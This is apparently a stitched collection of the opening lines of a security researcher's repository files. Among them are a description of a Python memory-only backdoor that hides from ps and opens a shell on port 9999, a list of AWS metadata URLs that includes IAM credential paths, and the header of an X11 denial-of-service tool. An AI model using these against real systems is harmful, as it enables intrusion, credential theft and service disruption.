epinna

#                                                                                                        
#   STL GDB evaluators/views/utilities - 1.03
#
#   The new GDB commands:                                                         
# 	    are entirely non instrumental                                             
# 	    do not depend on any "inline"(s) - e.g. size(), [], etc
#       are extremely tolerant to debugger settings
#                                                                                 
#   This file should be "included" in .gdbinit as following:
#   source stl-views.gdb or just paste it into your .gdbinit file

epinna

#!/usr/bin/env python

# This script prints a simple one-liner memory-only backdoor agent which hides from ps.

# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite 
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)

template = """
import sys,re,pty,os,socket

epinna

#!/usr/bin/env python
# encoding: utf-8

# Setup introductions:
# Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS
# (Accounts > Domain List > Advanced DNS)
# Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address.
# Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password).
# Run and have fun!

epinna

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

epinna

#!/usr/bin/env python
# coding: utf-8
#
# Copyright (C) Michael Ihde 2004 <mike.ihde@randomwalking.com>
#
# Distributed under the Python License
#
# iprange is a useful module that creates iprange generators similar
# to python's xrange.  This allows you to write statements such as
#

epinna

#!/usr/bin/python

__doc__ = """Tiny HTTP Proxy.

This module implements GET, HEAD, POST, PUT and DELETE methods
on BaseHTTPServer, and behaves as an HTTP proxy.  The CONNECT
method is also implemented experimentally, but has not been
tested yet.

Any help will be greatly appreciated.		SUZUKI Hisao

epinna

FROM ubuntu:latest

ARG LOCALE=en_US
ARG CHARMAP=UTF-8
ARG DEBIAN_FRONTEND=noninteractive

RUN dpkg --add-architecture i386
RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \
    autoconf \
    apache2 \

epinna

<?

/*

popfinder.php -	Emilio Pinna 2013

Popfinder is a simple script that can helps code analysis of PHP in case of possible object 
injection[1][2] in unserialize function. 

epinna

# Tested with Python 3.5.2

from config import LOGLEVEL
import logging

class SrvLogFormat(logging.Formatter):

    err_fmt  = "[E] %(msg)s"
    warn_fmt  = "[!] %(msg)s"
    dbg_fmt  = "[D] %(module)s: %(lineno)d: %(msg)s"

epinna

/*  2/5/00 1.0
    Xsh0k.c        by n0rby -- NeURaL CoLLaPsE CrEw.
             main code by AcidCrash -- NeURaL CoLLaPsE CrEw.

   This dos simply creates a sequence of socket connections to Xwindow port
   of a remote server. This cause a very disturbing effect to the XWindow user.
   There are many and various effects: frequently Xwindow slows so much that
   it's quite impossible to start new X programs; sometimes Xwindow don't
   recognizes some keys or mouse input, and, more rarely it crash and
   leave the user to the bash.